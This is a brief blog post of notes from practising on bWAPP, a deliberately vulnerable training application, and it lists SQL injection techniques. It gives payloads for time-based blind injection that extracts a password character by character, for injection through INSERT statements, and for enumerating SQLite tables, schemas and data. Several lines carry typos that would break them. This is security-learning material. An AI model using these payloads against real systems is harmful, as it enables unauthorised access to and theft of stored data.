Learnings from BWAPP

Ditto
1 min readDec 26, 2020

--

  • Blind SQL injection (login form / user)
Select * from users where login = ‘bee’AND ((SELECT IF(SUBSTRING(password,1,1) = ‘6’,SLEEP(5),null)FROM users WHERE login = ‘bee’))#
  • Bypass sanitization by addslashes and mysql_real_escape_string
  • Server Side Includes (SSI) injection and its causes
  • SQL injection with INSERT Statement
INSERT INTO BLOG (data, entry, owner) values (now(), ‘a’,(SELECT version()))#

Time based SQL injection can also happen within INSERT STATEMENT:

INSERT INTO BLOG  (data, entry, owner) valeus (now(), 'a',(SELECTIF ( substring (password,1,1) = "6", sleep(5), null )from users where id = 2))#
  • SQLite Database Injection
INSERT INTO blog (id, date, entry, owner) VALUES (16,’2020–12–26',’atesting’, (select sqlite_version())) — ‘,’bee’);

Table Names:

atesting', (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') )--

Column Names:

atesting', (SELECT sql FROM sqlite_master WHERE type!="meta" AND sql NOT NULL AND name = "blog") )--

Data!!!

atesting', (select entry from blog limit 1) )--

--

--

No responses yet